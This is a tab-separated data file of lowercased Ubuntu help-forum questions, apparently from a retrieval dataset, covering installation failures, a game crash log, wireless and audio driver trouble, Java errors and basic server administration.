172420	having trouble installing lubuntu . lenovo c100	using a live cd the boot locks up on load screen , no matter if trying out or installing . trying to use a usb the booter does not even get read . on the live disk it just stops reading the disk after a minute . any help would be appreciated . i can install ubuntu on the machine fine but it runs to heavy for the machine .
172421	amnesia closes when loading	i have a thinkpad t410 , ubuntu 12.04 and humble bundle v. when i run amnesia it closes when loading . i appreciate the help . lucasa @ lucasa : ~ $ alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started al lib : alsa.c:512 : could not open playback device 'hw:0,0 ' : device or resource busy *** glibc detected *** ./amnesia.bin : malloc ( ) : smallbin double linked list corrupted : 0x0c152020 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x73e42 ) [ 0xb6fd7e42 ] /lib/i386-linux-gnu/libc.so.6 ( +0x75fbf ) [ 0xb6fd9fbf ] /lib/i386-linux-gnu/libc.so.6 ( __libc_calloc+0xb6 ) [ 0xb6fdcd46 ] /usr/lib/i386-linux-gnu/dri/libdricore.so ( hash_table_insert+0x46 ) [ 0xb5718416 ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( _zn10fs_visitor5visitep11ir_variable+0xba ) [ 0xb58d677a ] /usr/lib/i386-linux-gnu/dri/libglsl.so ( _zn11ir_variable6acceptep10ir_visitor+0x17 ) [ 0xb5502e27 ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( _zn10fs_visitor5visitep11ir_function+0x95 ) [ 0xb58d66b5 ] /usr/lib/i386-linux-gnu/dri/libglsl.so ( _zn11ir_function6acceptep10ir_visitor+0x17 ) [ 0xb5502e77 ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( _zn10fs_visitor3runev+0x157 ) [ 0xb58d2cf7 ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( brw_wm_fs_emit+0x35e ) [ 0xb58d31fe ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( do_wm_prog+0x11e ) [ 0xb58ab51e ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( +0x5ac72 ) [ 0xb58abc72 ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( brw_upload_state+0x14f ) [ 0xb58a142f ] /usr/lib/i386-linux-gnu/dri/i965_dri.so ( brw_draw_prims+0x6d7 ) [ 0xb588c6f7 ] /usr/lib/i386-linux-gnu/dri/libdricore.so ( +0x111f5d ) [ 0xb56e9f5d ] /usr/lib/i386-linux-gnu/dri/libdricore.so ( +0x11233d ) [ 0xb56ea33d ] ./amnesia.bin ( _zn3hpl20cvertexbufferogl_vbo4drawens_21evertexbufferdrawtypee+0x54 ) [ 0x85c3784 ] ./amnesia.bin ( _zn3hpl17crendererdeferred23renderlights_renderbackev+0x104 ) [ 0x841a794 ] ./amnesia.bin ( _zn3hpl17crendererdeferred12renderlightsev+0x138 ) [ 0x841c2f8 ] ./amnesia.bin ( _zn3hpl17crendererdeferred13renderobjectsev+0x191 ) [ 0x841eb41 ] ./amnesia.bin ( _zn3hpl9irenderer6renderefpns_8cfrustumepns_6cworldepns_15crendersettingsepns_13crendertargetebpst4listipns_17irenderercallbackesaisb_ee+0x5c ) [ 0x844323c ] ./amnesia.bin ( _zn3hpl6cscene6renderefj+0x11f ) [ 0x845f5ff ] ./amnesia.bin ( _zn3hpl7cengine3runev+0x2f7 ) [ 0x8569287 ] ./amnesia.bin ( _z7hplmainrkss+0x44 ) [ 0x82b68f4 ] ./amnesia.bin ( main+0x14d ) [ 0x854fe8d ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb6f7d4d3 ] ./amnesia.bin ( ftell+0x45 ) [ 0x8198441 ] ======= memory map : ======== 08048000-08858000 r-xp 00000000 08:01 34958 /opt/amnesia/amnesia.bin 08858000-0885d000 rw-p 00810000 08:01 34958 /opt/amnesia/amnesia.bin 0885d000-0886f000 rw-p 00000000 00:00 0 095be000-0c6a9000 rw-p 00000000 00:00 0 [ heap ] a7e00000-a7ec3000 rw-p 00000000 00:00 0 a7ec3000-a7f00000 -- -p 00000000 00:00 0 a9db9000-a9f39000 rw-s 254c7000 00:05 3233 /dev/dri/card0 aa2bb000-aa43b000 rw-s 265bb000 00:05 3233 /dev/dri/card0 aa43b000-aa5bb000 rw-s 2643b000 00:05 3233 /dev/dri/card0 aa5bb000-aa73b000 rw-s 262bb000 00:05 3233 /dev/dri/card0 aa73b000-aa73c000 -- -p 00000000 00:00 0 aa73c000-aaf3c000 rw-p 00000000 00:00 0 aaf3c000-aaf3d000 -- -p 00000000 00:00 0 aaf3d000-ab73d000 rw-p 00000000 00:00 0 ab73d000-ab73e000 -- -p 00000000 00:00 0 ab73e000-abf3e000 rw-p 00000000 00:00 0 abf3e000-abf9e000 rw-s 24270000 00:05 3233 /dev/dri/card0 abf9e000-abffe000 rw-s 24210000 00:05 3233 /dev/dri/card0 abfff000-b0000000 rw-s 00000000 00:12 39317 /run/shm/pulse-shm-1564699572 b0000000-b0021000 rw-p 00000000 00:00 0 b0021000-b0100000 -- -p 00000000 00:00 0 b01dd000-b035d000 rw-s 2613b000 00:05 3233 /dev/dri/card0 b035d000-b035e000 -- -p 00000000 00:00 0 b035e000-b0b5e000 rw-p 00000000 00:00 0 b0b5e000-b0f5e000 rw-s 25d3b000 00:05 3233 /dev/dri/card0 b0f5f000-b0fcf000 rw-s 00000000 00:04 40547 /drm mm object ( deleted ) b0fcf000-b103f000 rw-s 00000000 00:04 40511 /drm mm object ( deleted ) b1108000-b1140000 rw-s 00000000 00:04 40554 /drm mm object ( deleted ) b1140000-b1300000 rw-s 00000000 00:04 40485 /drm mm object ( deleted ) b1300000-b1381000 rw-p 00000000 00:00 0 b1381000-b1400000 -- -p 00000000 00:00 0 b1420000-b1500000 rw-s 00000000 00:04 40484 /drm mm object ( deleted ) b1500000-b15c1000 rw-p 00000000 00:00 0 b15c1000-b1600000 -- -p 00000000 00:00 0 b161a000-b1622000 rw-s 00000000 00:04 35516 /drm mm object ( deleted ) b1622000-b17a2000 rw-s 25bbb000 00:05 3233 /dev/dri/card0 b17c6000-b17fe000 rw-s 00000000 00:04 40546 /drm mm object ( deleted ) b17fe000-b1836000 rw-s 00000000 00:04 40486 /drm mm object ( deleted ) b1839000-b183d000 rw-s 00000000 00:04 40574 /drm mm object ( deleted ) b183d000-b1841000 rw-s 00000000 00:04 40573 /drm mm object ( deleted ) b1841000-b1848000 rw-s 00000000 00:04 40572 /drm mm object ( deleted ) b1848000-b184f000 rw-s 00000000 00:04 40571 /drm mm object ( deleted ) b184f000-b185d000 rw-s 00000000 00:04 40555 /drm mm object ( deleted ) b185d000-b186b000 rw-s 00000000 00:04 40548 /drm mm object ( deleted ) b186b000-b1887000 rw-s 00000000 00:04 40533 /drm mm object ( deleted ) b1887000-b18b7000 rw-s 25647000 00:05 3233 /dev/dri/card0 b18c8000-b18c9000 rw-p 00000000 00:00 0 b18c9000-b18ca000 rw-s 26740000 00:05 3233 /dev/dri/card0 b18ca000-b18cb000 rw-s 2673f000 00:05 3233 /dev/dri/card0 b18cb000-b18cc000 rw-s 00000000 00:04 40727 /drm mm object ( deleted ) b18cc000-b18cd000 rw-s 00000000 00:04 40724 /drm mm object ( deleted ) b18cd000-b18dd000 rw-s 00000000 00:04 38152 /drm mm object ( deleted ) b18dd000-b18ed000 rw-s 00000000 00:04 35519 /drm mm object ( deleted ) b18ed000-b18ee000 rw-s 00000000 00:04 38153 /drm mm object ( deleted ) b18ee000-b18ef000 rw-s 2673e000 00:05 3233 /dev/dri/card0 b18ef000-b18f0000 rw-s 00000000 00:04 40726 /drm mm object ( deleted ) b18f0000-b18f1000 rw-s 2673d000 00:05 3233 /dev/dri/card0 b18f1000-b18f2000 rw-s 00000000 00:04 40723 /drm mm object ( deleted ) b18f2000-b18f3000 rw-s 2673c000 00:05 3233 /dev/dri/card0 b18f3000-b18f4000 rw-s 00000000 00:04 40720 /drm mm object ( deleted ) b18f4000-b18f5000 rw-s 2673b000 00:05 3233 /dev/dri/card0 b18f5000-b18f6000 rw-s 00000000 00:04 40718 /drm mm object ( deleted ) b18f6000-b18f7000 rw-s 00000000 00:04 40717 /drm mm object ( deleted ) b18f7000-b18f8000 rw-s 00000000 00:04 40716 /drm mm object ( deleted ) b18f8000-b1908000 rw-s 00000000 00:04 35515 /drm mm object ( deleted ) b1908000-b1924000 rw-s 00000000 00:04 40704 /drm mm object ( deleted ) b1924000-b1928000 rw-s 00000000 00:04 40703 /drm mm object ( deleted ) b1928000-b192f000 rw-s 00000000 00:04 40696 /drm mm object ( deleted ) b192f000-b194b000 rw-s 00000000 00:04 40695 /drm mm object ( deleted ) b194b000-b1967000 rw-s 00000000 00:04 40694 /drm mm object ( deleted ) b1967000-b1975000 rw-s 00000000 00:04 40680 /drm mm object ( deleted ) b1975000-b1977000 rw-s 00000000 00:04 40673 /drm mm object ( deleted ) b1977000-b197b000 rw-s 256a7000 00:05 3233 /dev/dri/card0 b197b000-b197f000 rw-s 00000000 00:04 40671 /drm mm object ( deleted ) b197f000-b1980000 rw-s 00000000 00:04 40666 /drm mm object ( deleted ) b1980000-b198e000 rw-s 00000000 00:04 40659 /drm mm object ( deleted ) b198e000-b199c000 rw-s 00000000 00:04 40658 /drm mm object ( deleted ) b199c000-b19b8000 rw-s 00000000 00:04 40657 /drm mm object ( deleted ) b19b8000-b19c6000 rw-s 00000000 00:04 40656 /drm mm object ( deleted ) b19c6000-b1ac6000 rw-s 253bb000 00:05 3233 /dev/dri/card0 b1ac7000-b1ace000 rw-s 00000000 00:04 40705 /drm mm object ( deleted ) b1ace000-b1aea000 rw-s 00000000 00:04 40520 /drm mm object ( deleted ) b1aea000-b1b1a000 rw-s 25677000 00:05 3233 /dev/dri/card0 b1b1a000-b1c1c000 rw-p 00000000 00:00 0 b1c1c000-b1d9c000 rw-s 2523b000 00:05 3233 /dev/dri/card0 b1d9c000-b219c000 rw-s 257bb000 00:05 3233 /dev/dri/card0 b219c000-b21a4000 rw-s 00000000 00:04 40406 /drm mm object ( deleted ) b21a4000-b2204000 rw-s 251db000 00:05 3233 /dev/dri/card0 b2204000-b2264000 rw-s 2517b000 00:05 3233 /dev/dri/card0 b2264000-b22c4000 rw-s 2511b000 00:05 3233 /dev/dri/card0 b22c4000-b2324000 rw-s 250bb000 00:05 3233 /dev/dri/card0 b2324000-b2384000 rw-s 2505b000 00:05 3233 /dev/dri/card0 b2384000-b23e4000 rw-s 24ffb000 00:05 3233 /dev/dri/card0 b23e4000-b2444000 rw-s 24f3b000 00:05 3233 /dev/dri/card0 b2444000-b24a4000 rw-s 244c7000 00:05 3233 /dev/dri/card0 b24a5000-b26a7000 rw-p 00000000 00:00 0 b26ac000-b26e4000 rw-s 00000000 00:04 40510 /drm mm object ( deleted ) b26e4000-b27e5000 rw-p 00000000 00:00 0 b27e5000-b2845000 rw-s 24467000 00:05 3233 /dev/dri/card0 b2845000-b28a5000 rw-s 24407000 00:05 3233 /dev/dri/card0 b28a6000-b2906000 rw-s 2431c000 00:05 3233 /dev/dri/card0 b2906000-b291e000 rw-s 24304000 00:05 3233 /dev/dri/card0 b291e000-b2936000 rw-s 242ec000 00:05 3233 /dev/dri/card0 b2936000-b294e000 rw-s 242d4000 00:05 3233 /dev/dri/card0 b294e000-b2952000 rw-s 00000000 00:04 40449 /drm mm object ( deleted ) b2952000-b2956000 rw-s 00000000 00:04 40448 /drm mm object ( deleted ) b2956000-b295a000 rw-s 00000000 00:04 40447 /drm mm object ( deleted ) b295a000-b295e000 rw-s 00000000 00:04 40446 /drm mm object ( deleted ) b295e000-b2962000 rw-s 00000000 00:04 40445 /drm mm object ( deleted ) b2962000-b2966000 rw-s 00000000 00:04 40444 /drm mm object ( deleted ) b2966000-b296a000 rw-s 00000000 00:04 40443 /drm mm object ( deleted ) b296a000-b296e000 rw-s 00000000 00:04 40442 /drm mm object ( deleted ) b296e000-b2c71000 rw-p 00000000 00:00 0 b2c72000-b2c80000 rw-s 00000000 00:04 40512 /drm mm object ( deleted ) b2c80000-b2c9c000 rw-s 00000000 00:04 40501 /drm mm object ( deleted ) b2c9c000-b2c9d000 rw-s 2437c000 00:05 3233 /dev/dri/card0 b2c9d000-b2cfd000 rw-s 24f9b000 00:05 3233 /dev/dri/card0 b2cfd000-b2eff000 rw-p 00000000 00:00 0 b2eff000-b2f00000 -- -p 00000000 00:00 0 b2f00000-b3700000 rw-p 00000000 00:00 0 b3700000-b3721000 rw-p 00000000 00:00 0 b3721000-b3800000 -- -p 00000000 00:00 0 b3800000-b3801000 rw-s 00000000 00:04 40619 /drm mm object ( deleted ) b3801000-b3805000 rw-s 00000000 00:04 40588 /drm mm object ( deleted ) b3805000-b380c000 rw-s 00000000 00:04 40581 /drm mm object ( deleted ) b380c000-b381a000 rw-s 00000000 00:04 40500 /drm mm object ( deleted ) b381a000-b381e000 rw-s 00000000 00:04 40477 /drm mm object ( deleted ) b381e000-b383a000 rw-s 00000000 00:04 40476 /drm mm object ( deleted ) b383a000-b3848000 rw-s 00000000 00:04 40475 /drm mm object ( deleted ) b3848000-b3854000 rw-s 254bb000 00:05 3233 /dev/dri/card0 b3854000-b385c000 rw-s 00000000 00:04 38154 /drm mm object ( deleted ) b385c000-b385d000 -- -p 00000000 00:00 0 b385d000-b405d000 rw-p 00000000 00:00 0 b405d000-b405e000 -- -p 00000000 00:00 0 b405e000-b40de000 rw-p 00000000 00:00 0 b40de000-b4109000 r-xp 00000000 08:01 398258 /usr/lib/i386-linux-gnu/alsa-lib/libasound_module_pcm_bluetooth.so b4109000-b410a000 r -- p 0002a000 08:01 398258 /usr/lib/i386-linux-gnu/alsa-lib/libasound_module_pcm_bluetooth.so b410a000-b410c000 rw-p 0002b000 08:01 398258 /usr/lib/i386-linux-gnu/alsa-lib/libasound_module_pcm_bluetooth.so b410c000-b4117000 r-xp 00000000 08:01 264354 /lib/i386-linux-gnu/libnss_files-2.15.so b4117000-b4118000 r -- p 0000a000 08:01 264354 /lib/i386-linux-gnu/libnss_files-2.15.so b4118000-b4119000 rw-p 0000b000 08:01 264354 /lib/i386-linux-gnu/libnss_files-2.15.so b4119000-b4123000 r-xp 00000000 08:01 264358 /lib/i386-linux-gnu/libnss_nis-2.15.so b4123000-b4124000 r -- p 00009000 08:01 264358 /lib/i386-linux-gnu/libnss_nis-2.15.so b4124000-b4125000 rw-p 0000a000 08:01 264358 /lib/i386-linux-gnu/libnss_nis-2.15.so b4125000-b4167000 r-xp 00000000 08:01 397980 /usr/lib/i386-linux-gnu/libjack.so.0.1.0 b4167000-b4168000 -- -p 00042000 08:01 397980 /usr/lib/i386-linux-gnu/libjack.so.0.1.0 b4168000-b4169000 r -- p 00042000 08:01 397980 /usr/lib/i386-linux-gnu/libjack.so.0.1.0 b4169000-b416a000 rw-p 00043000 08:01 397980 /usr/lib/i386-linux-gnu/libjack.so.0.1.0 b416a000-b4196000 r-xp 00000000 08:01 398102 /usr/lib/i386-linux-gnu/libportaudio.so.2.0.0 b4196000-b4197000 r -- p 0002b000 08:01 398102 /usr/lib/i386-linux-gnu/libportaudio.so.2.0.0 b4197000-b4198000 rw-p 0002c000 08:01 398102 /usr/lib/i386-linux-gnu/libportaudio.so.2.0.0 b4198000-b4199000 -- -p 00000000 00:00 0 b4199000-b4999000 rw-p 00000000 00:00 0 b4999000-b49b1000 rw-s 241f8000 00:05 3233 /dev/dri/card0 b49b1000-b49b2000 rw-s 00000000 00:04 40407 /drm mm object ( deleted ) b49b2000-b49b3000 rw-p 00000000 00:00 0 b49b3000-b49b4000 rw-s 241f2000 00:05 3233 /dev/dri/card0 b49b4000-b54bb000 rw-p 00000000 00:00 0 b54bb000-b55d0000 r-xp 00000000 08:01 401382 /usr/lib/i386-linux-gnu/dri/libglsl.so b55d0000-b55d5000 r -- p 00114000 08:01 401382 /usr/lib/i386-linux-gnu/dri/libglsl.so b55d5000-b55d7000 rw-p 00119000 08:01 401382 /usr/lib/i386-linux-gnu/dri/libglsl.so b55d7000-b55d8000 rw-p 00000000 00:00 0 b55d8000-b5833000 r-xp 00000000 08:01 401383 /usr/lib/i386-linux-gnu/dri/libdricore.so b5833000-b5834000 -- -p 0025b000 08:01 401383 /usr/lib/i386-linux-gnu/dri/libdricore.so b5834000-b583a000 r -- p 0025b000 08:01 401383 /usr/lib/i386-linux-gnu/dri/libdricore.so b583a000-b583c000 rw-p 00261000 08:01 401383 /usr/lib/i386-linux-gnu/dri/libdricore.so b583c000-b5851000 rw-p 00000000 00:00 0 b5851000-b592b000 r-xp 00000000 08:01 401378 /usr/lib/i386-linux-gnu/dri/i965_dri.so b592b000-b592d000 r -- p 000d9000 08:01 401378 /usr/lib/i386-linux-gnu/dri/i965_dri.so b592d000-b592f000 rw-p 000db000 08:01 401378 /usr/lib/i386-linux-gnu/dri/i965_dri.so b592f000-b5a2e000 rw-p 00000000 00:00 0 b5a2e000-b5a2f000 -- -p 00000000 00:00 0 b5a2f000-b6269000 rw-p 00000000 00:00 0 b6269000-b626d000 rw-s 00000000 00:04 40502 /drm mm object ( deleted ) b626d000-b629f000 r-xp 00000000 08:01 431535 /usr/lib/i386-linux-gnu/libtxc_dxtn_s2tc.so.0.0.0 b629f000-b62a0000 r -- p 00031000 08:01 431535 /usr/lib/i386-linux-gnu/libtxc_dxtn_s2tc.so.0.0.0 b62a0000-b62a1000 rw-p 00032000 08:01 431535 /usr/lib/i386-linux-gnu/libtxc_dxtn_s2tc.so.0.0.0 b62a1000-b62aa000 r-xp 00000000 08:01 398082 /usr/lib/i386-linux-gnu/libpciaccess.so.0.11.0 b62aa000-b62ab000 r -- p 00008000 08:01 398082 /usr/lib/i386-linux-gnu/libpciaccess.so.0.11.0 b62ab000-b62ac000 rw-p 00009000 08:01 398082 /usr/lib/i386-linux-gnu/libpciaccess.so.0.11.0 b62ac000-b62c9000 r-xp 00000000 08:01 397807 /usr/lib/i386-linux-gnu/libdrm_intel.so.1.0.0 b62c9000-b62ca000 r -- p 0001c000 08:01 397807 /usr/lib/i386-linux-gnu/libdrm_intel.so.1.0.0 b62ca000-b62cb000 rw-p 0001d000 08:01 397807 /usr/lib/i386-linux-gnu/libdrm_intel.so.1.0.0 b62cb000-b62d4000 r-xp 00000000 08:01 397653 /usr/lib/i386-linux-gnu/libxcursor.so.1.0.2
172423	12.04 install stuck on 2 out of 5 dots	i 've been trying to install ubuntu for a while on my old windows vista laptop . i have successfully installed it onto my windows 7 computer with no problem . i could n't find any info on this though but when i 'm trying to install , it hangs at 2 out of the 5 dots . i 've tried wubi and 3 different disks with no help . does anybody know how to fix this ? it does this after i try to boot from cd .
172429	after i boot my usb stick with ubuntu 12.04 on and click install on hard disk the installer freezes	as soon as it loads the languages list it freezes , i can still move my mouse but cant click anything .
172432	can not connect to internet ( b43 related problem )	i recently came upon a dell 1545 inspiron laptop and decided to put a fresh install of 10.04 lts . at first i could n't connect to the internet because i did not install the driver for my wireless card ( broadcom 4312 ) , but then i installed the first of the two drivers under the proprietary drivers list , it was the broadcom b43 wireless driver . while that was active , i could detect wireless networks but could not connect to a network . i then tried to switch to the other set of drivers , the sta set . now , i can not even detect networks . please help .
172440	how do i setup wireless on hp nc8430 ?	how do i setup or enable wireless on a hp compaq nc8430 laptop ? and is there a recommended list of software updates for an nc8430 ? thank you .
172447	how do i prevent the blank screensaver when using keyboard shortcut to lock the computer ?	i lock my computer a lot , and was wondering if there was a way to get the lock screen when i hit ctrl + alt + l. right now when i use that key combination it turns the screen black , and i have to hit a key or click to bring up the screen where it shows the option to enter your password or switch users , as well as displaying the desktop background behind it . is there anyway to avoid having to hit that extra key , to bring up the screen i want ? and is there anyway to keep it that way ? it 's really a matter of personal preference , and i do n't see any reason why not to have it stay that way as my monitor eventually is turned off and/or my computer suspended .
172450	how do you remove overlays in smplayer ?	i 'm very new to linux . there 's a lot i like about smplayer . however , i find some of the overlays very annoying . i often watch large playlists of many short files . every time a new file starts , several overlays appear giving information about the lack of subtitles . i find these very distracting . worse , when i skip forward with the arrow keys ( which i do very frequently ) , a white progress bar appears in the center of the screen , distracting my view and blocking the picture . is there any way to disable these overlays ?
172451	half of screen is missing after fresh installation	i just installed ubuntu on my asus eeepc 1201hab machine and something is off . even during installation half of the screen would not be in use and when trailing the mouse around little patches of boxes appear . another weird thing about this installation is that when i push my cursor all the way to the top the reemerges from the bottom of the screen . i have n't touched the xorg configuration . also took pictures to help demonstrate what i mean . and another one
172456	how to view apk icons in nautilus ?	i want to view .apk ( android apps ) on nautilus . there 's already a solution for windows e.g . apkshellext but it 's not supported for linux or ubuntu . so , how can i view apk icon in thumbnail on ubuntu ?
172457	why do i get `` package not found '' when trying to install jabref with apt-get ?	i can find a particular application 'jabref ' at the ubuntu software centre . but whenever i type sudo apt-get install jabref in terminal , it says package not found . what 's going wrong here ? do i have to capitalise the exact letters as in the application name or do i need some additional steps to make sure the terminal looks at the correct repository for the particular installer ?
172466	xubuntu 12.04 - change orientation of workspace switcher on a vertical panel	in xubuntu 12.04 i want to place workspace switcher on a vertical panel to give myself more space on the top panel for the window list buttons . the problem is that the workspace switcher is still shown horizontally on the vertical panel . it would be great if the two workspace buttons were displayed vertically one on top of another .
172468	recover mail from thunderbird	i have to recover some critical mails from mozilla thunderbird installed on my pc . i am not sure how to recover these mails . kindly help .
172471	what programming language should i understand to use ubuntu ?	i roamed around these forums and look for answers to questions before asking them myself . for example , skype and how it appears to be online but really it is n't . as i was reading this particular thread i found my self in a lot of talk about what to type into the terminal so it would work . now as a total newbie when it comes to linux i want to play it safe and not just copy and paste said solutions into the terminal for a couple of reasons , firstly because i do n't know what they mean and lastly because if i do just copy and paste i could be leaving myself open to attacks . yes , i know linux is safe , but as i said i am a nub to these things . which leads to my question : what do i need to read , learn , and understand when it comes to ubuntu 's terminal and what sort of programming languages should i grasp , basic wise , so i do n't find myself opening pandora 's box ? appreciate the help in advance .
172472	apache tomcat 7.0.29 performs very slow on ubuntu server 12.04	we have 16 gb of ram and trying to access our applications hosted through the server with apache tomcat 7.0.29 in ubuntu server 12.04 ( gui ) . all our applications are running very very slow ... please suggest a way to make the applications run faster ...
172473	connecting to the wireless ( wpa ) from commandline	i want to be able to connect to my wifi ( wpa ) network from the command line.i installed wpasupplicant from the repository and created two files . one a script and another a configuration file . bash script : # ! /bin/sh iface=wlan0 # shut down interface ifconfig $ iface down # set ad-hoc/management of wireless device iwconfig $ iface mode managed # enable interface ifconfig $ iface up # stop any persistent wireless wpa2 sessions killall wpa_supplicant # apply wpa/wpa2 personal settings to device wpa_supplicant -b -dwext -i $ iface -c ./wireless-wpa.conf -dd # obtain an ip address dhclient $ iface conf file : # config file using wpa/wpa2-psk personal key . ctrl_interface=/var/run/wpa_supplicant network= { ssid= '' ssid '' scan_ssid=1 key_mgmt=wpa-psk psk= '' pass '' } however i keep getting this error : initializing interface 'wlan0 ' conf './wireless-wpa.conf ' driver 'wext ' ctrl_interface 'n/a ' bridge 'n/a' configuration file './wireless-wpa.conf ' - > '/home/itsy/desktop/./wireless-wpa.conf' reading configuration file '/home/itsy/desktop/./wireless-wpa.conf' failed to read or parse configuration '/home/itsy/desktop/./wireless-wpa.conf ' . failed to add interface wlan0 cancelling scan request cancelling authentication timeout i have even tried substituting wpa_passphrase `` myssid '' , enter the pass and paste it into the conf file . it still does not work . could someone please tell me what i am doing wrong ?
172475	java run time error	i get following error when i try to run a java program exception in thread `` main '' java.lang.unsupportedclassversionerror : abc : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:634 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : abc . program will exit .
172477	fonts too small in chrome in 12.04	i 'm having trouble getting fonts to display at the correct size in chrome . here is a side-by-side of firefox and chrome on the same system ( chrome left , firefox right ) , and another shot from my mac . click through to see either image in full size . notice how in the email section , and in the description below the repository ( below where it says unicodeforus in blue ) , the text is several pixels smaller in chrome . i did make sure that both firefox and chrome are set to use the same fonts . this does n't look like much , but it happens for a lot sans-serif text on the web , and it 's very distracting .
172481	is bash scripting the same as shell scripting ?	i 'm very new to ubuntu . i hear people say `` shell scripting '' , `` bash scripting '' . i wonder are they same ? or they are different ? thanks in advance .
172484	gnome mail icon from top bar shows number of unread email	i 'm very new to ubuntu so please bear with me . on the latest ubuntu ( 12.04 ) i have set up thunderbird to read my gmail account . i know there are browser addons that show you how many unread emails you have , but is there a way i can get this integrated with the unity mail icon on the top bar ?
172488	volume control stopped working - always max voume	a few days ago out of nowhere i noticed my volume control stopped working . the audio itself works fine , but changing the volume does not actually do anything . even if you mute it , it still plays all audio at max volume . i tried pulseaudio -- start but it did not help . i am using radeon gpu so i notice my bootloader starts radeon audio , which may be why pulseaudio is n't working ? i do n't know much about this audi
172495	why wo n't hdmi audio work with radeon hd 7850 ?	i 've got a brand new build and an updated install of 12.04 . i was having trouble with installing radeon drivers from the 'additional drivers ' application , so i followed the directions here : http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide to download and install the drivers and catalyst directly from amd . video works fine now , but i 'm having no luck with audio . in the 'sound settings ' dialog , i ca n't choose hdmi out as the output device . i also tried adding radeon.audio=1 as a boot parameter , but i 'm still having no luck . any ideas on how to get hdmi audio out ?
172497	how do i recoll search my ntfs partition ?	i have multiple os in my desktop in which i use recoll and recoll lens for desktop search on ubuntu . i want to search my ntfs ( windows ) partition from ubuntu desktop . how can i do it ? i have looked in to preferences but do n't know how to add windows partitions in that which can be search from ubuntu ?
172499	how to setup password for the files in apache ?	i have setup lamp on my ubuntu 12.04 system.i want to set password for all the files inside the root folder of apache.so that only authorized person can use them.so how to set password for the folders for the apache ? any help and suggestions will be highly appreciable .
172504	how to keep track of where i spend my time ?	is there any way in ubuntu ( 11.04 to be exact ) to keep track of how much time i spend on different web sites and in different applications ? i think this might help me be more productive . i usually have many applications open at the same time , but only one of them is visible . the same with tabs in the browser .
172505	set launcher reveal mode to intellihide	starting from ubuntu 12.04 ( precise pangolin ) , unity stopped supporting the intellihide reveal mode for the unity launcher . however , ubuntu tweak can still change the settings so that it does intellihide , and it works well ( at least in unity 2d ) unless you open appearance preferences . this is what i have been using to set the mode to intellihide . i want to know , what are the commands ( like using gsettings , etc . ) that i can use to set intellihide this way because then i wo n't need to install ubuntu tweak just to change the launcher settings .
172509	mapping ctrl-x to ctrl-a without xserver on ubuntu 12.04	inspired by this article : http : //m.linuxjournal.com/content/swap-your-laptop-ipad-linode ? page=0,3 i have tried to emulate the set up of an ipad connecting to a ubuntu box hosted by linode . everything works fine apart from the gnu screen switching with ctrl-a . as the author explains : '' ctrl-x is my screen 's `` hot key '' ; it defaults to ctrl-a , but on a wireless keyboard , that leaves unicode characters in the terminalâi assume this is related to apple 's support for some common emacs keybindings in ios . it 's strange , but easy enough to work around '' easy enough , he says , but it has defeated me ! i have tried bind , but ca n't seem to control the ctrl keys , and am reluctant to use xmodmap as i do n't want to use any graphical output . the apple wireless keyboard does n't seem to allow any system kep map settings either . everything else works beautifully , so this seems like such a silly place to get stuck .
172514	how do i uninstall mysql ?	i installed mysql using sudo apt-get . now i need to remove it from my system . how can i do that ?
172524	how can i check if automatic updates are enabled ?	i want to be sure if automatic updates are enabled on ubuntu 12.04 server . how exactly can i check this ? and how can i disable automatic updates if it 's enabled ?
172526	best practices for ubuntu 12.04 server	i would like to know about best practices for ubuntu 12.04 server for production environment . for instance , recently i found whoopsie service , after short investigation i decided that i do n't really need this service on my production server , so i disabled it . i am looking for this kind of practices , services that can be disabled , non-standard useful services that can be installed .
172531	/usr/sbin/grub never finishes	i did apt-get upgrade it never finishes at this point : searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.2.0-24-virtual updating /boot/grub/menu.lst ... done you already have a noloader configuration in /etc/grub.conf running boot loader as requested running /usr/sbin/grub ... the system does not freeze ( ctrl-z works , i get my console back ) just that that /usr/sbin/grub seems to never complete . what should i do ?
172533	why my wireless mouse does n't work in ubuntu	i recently installed ubuntu 12.04 on my laptop but my wireless mouse is not working on it . i have windows 7 installed on my laptop but my mouse is working properly on it . my mouse is 2.4 gh generous what should i do ? ?
